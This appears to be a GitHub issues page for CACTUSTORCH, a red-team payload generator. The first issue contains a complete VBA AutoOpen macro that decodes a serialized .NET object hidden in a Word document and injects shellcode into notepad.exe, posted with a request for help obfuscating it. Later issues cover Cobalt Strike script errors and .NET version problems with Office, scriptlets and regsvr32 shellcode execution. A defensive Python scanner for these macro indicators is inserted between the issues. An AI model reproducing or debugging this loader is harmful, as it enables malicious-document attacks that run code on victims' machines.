mdsecactivebreach / cactustorch
CACTUSTORCH: Payload Generation for Adversary Simulations
Is there a way to add a string reverse function into the split?
Hi Vincent,
Thanks for this awesome project. I'm trying to obfuscate the script a bit by extracting the code and serialized_obj variables from the text in the Word document. All the rest of the code is the same as your original code. All the variables seem to populate correctly, however, at Set d = fmt.Deserialize_2(stm) I'm getting the error:
Apparently it can't deserialize the binary.
I wouldn't normally reach out to you for such issues, but I've been pulling hair out of my head out of frustration. Hope you can identify the issue. Thanks a lot in advance!
Public binary As String
Public code As String
Sub Init()
binary = "notepad.exe"
code = getText("AAAAAA")
End Sub
Private Function getText(id)
Dim res As String
Dim par As String
Dim i As Long
iParCount = ActiveDocument.Paragraphs.Count
For J = 1 To iParCount
par = ActiveDocument.Paragraphs(J).Range.Text
If InStr(par, id) Then
res = par
End If
Next J
getText = res
End Function
Private Function decodeHex(hex)
On Error Resume Next
Dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.dataType = "bin.hex"
EL.Text = hex
decodeHex = EL.nodeTypedValue
End Function
Function Run()
Dim entry_class, serialized_obj
entry_class = "cactusTorch"
Dim stm As Object, fmt As Object, al As Object
Set stm = CreateObject("System.IO.MemoryStream")
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = CreateObject("System.Collections.ArrayList")
serialized_obj = getText("00000000000")
' serialized_obj = "0001000000FFFFF..."
MsgBox Len(serialized_obj)
' Len(serialized_obj) = 17957
Dim dec
dec = decodeHex(serialized_obj)
For Each i In dec
stm.WriteByte i
Next i
stm.Position = 0
Dim n As Object, d As Object, o As Object
Set n = fmt.SurrogateSelector
Set d = fmt.Deserialize_2(stm)
al.Add n
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
o.flame binary, code
End Function
Sub AutoOpen()
Init
Run
End Sub
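For defenders triaging documents like the one in the issue above, a static check over extracted macro source (an added example, not part of the issue or the project's code). It flags the COM-created BinaryFormatter, Deserialize and DynamicInvoke calls together with an auto-run entry point, all of which stay in the macro text even when the string values are read from the document body. The sample macros are constructed and the alert rule is an assumption.

```python
import re

# Patterns are the API strings visible in the macro quoted above.
INDICATORS = {
    "com_memorystream": r'CreateObject\(\s*"System\.IO\.MemoryStream"',
    "com_binaryformatter": r'CreateObject\(\s*"System\.Runtime\.Serialization\.Formatters\.Binary\.BinaryFormatter"',
    "deserialize": r"\.Deserialize(_2)?\s*\(",
    "dynamic_invoke": r"\.DynamicInvoke\s*\(",
    "auto_exec": r"^\s*(?:Public\s+|Private\s+)?Sub\s+(?:AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b",
}
CHAIN = {"com_binaryformatter", "deserialize", "dynamic_invoke"}  # assumed alert rule

def strip_comment(line):
    """Drop a VBA ' comment unless the apostrophe sits inside a string literal."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line

def scan(src):
    """Return matched indicator names and whether chain plus auto-exec is present."""
    src = re.sub(r"[ \t]+_\r?\n[ \t]*", " ", src)  # join VBA line continuations
    text = "\n".join(strip_comment(l) for l in src.splitlines())
    hits = {n for n, rx in INDICATORS.items() if re.search(rx, text, re.I | re.M)}
    return {"hits": sorted(hits), "alert": CHAIN <= hits and "auto_exec" in hits}

# Constructed sample: lines abridged from the macro above, no payload data.
SUSPECT = '''Function Run()
Set stm = CreateObject("System.IO.MemoryStream")
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
' serialized_obj = "0001000000FFFFF..."
Set d = fmt.Deserialize_2(stm)
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
End Function
Sub AutoOpen()
Run
End Sub
'''
# Constructed benign macro: the API name appears only inside a comment.
BENIGN = '''Sub Workbook_Open()
' old test: Set d = fmt.Deserialize_2(stm)
MsgBox "It's ready"
End Sub
'''

print(scan(SUSPECT), scan(BENIGN))
```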
Hello,
I'm trying to load the CNA script into Cobalt Strike. It loads normally,
but when I want to launch it from the Attacks tab it doesn't show me the
payload generation box.
These lines have errors, please fix them:
[19:57:04] Attempted to call non-existent function &dialog at CACTUSTORCH.cna:736
[19:57:04] Attempted to call non-existent function &dialog_description at CACTUSTORCH.cna:737
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:738
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:739
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:740
[19:57:04] Attempted to call non-existent function &drow_listener_stage at CACTUSTORCH.cna:741
[19:57:04] Attempted to call non-existent function &drow_checkbox at CACTUSTORCH.cna:742
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:743
[19:57:04] Attempted to call non-existent function &drow_combobox at CACTUSTORCH.cna:744
[19:57:04] Attempted to call non-existent function &dbutton_action at CACTUSTORCH.cna:745
[19:57:04] Attempted to call non-existent function &dialog_show at CACTUSTORCH.cna:748
Thanks
Regards
Has this method been successful where only a .NET v4 runtime is present? For example from a default Windows 10 install with Excel 2013, the macro fails on:
Set stm = CreateObject("System.IO.MemoryStream")
The minute I add .NET v2, Excel calls the version 2 assembly just fine and runs my payload. Does Excel have known issues with calling the newest .NET v4 assembly? I notice the same behavior if I try to use a scriptlet and call:
Declare Function DllInstall Lib "scrobj.dll" (ByVal bInstall As Boolean, ByRef pszCmdLine As Any) As Long
I get an error on:
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
If I call the same scriptlet with regsvr32 on Win10 (with only .NET v4) it runs just fine and my shellcode runs. I even see the .NET 4 assembly loaded into regsvr32.exe. If I run the JavaScript standalone through the Windows Script Host, it works fine. The only problem appears to be with Microsoft Office and the way it doesn't seem to be using the .NET v4 library. Thanks!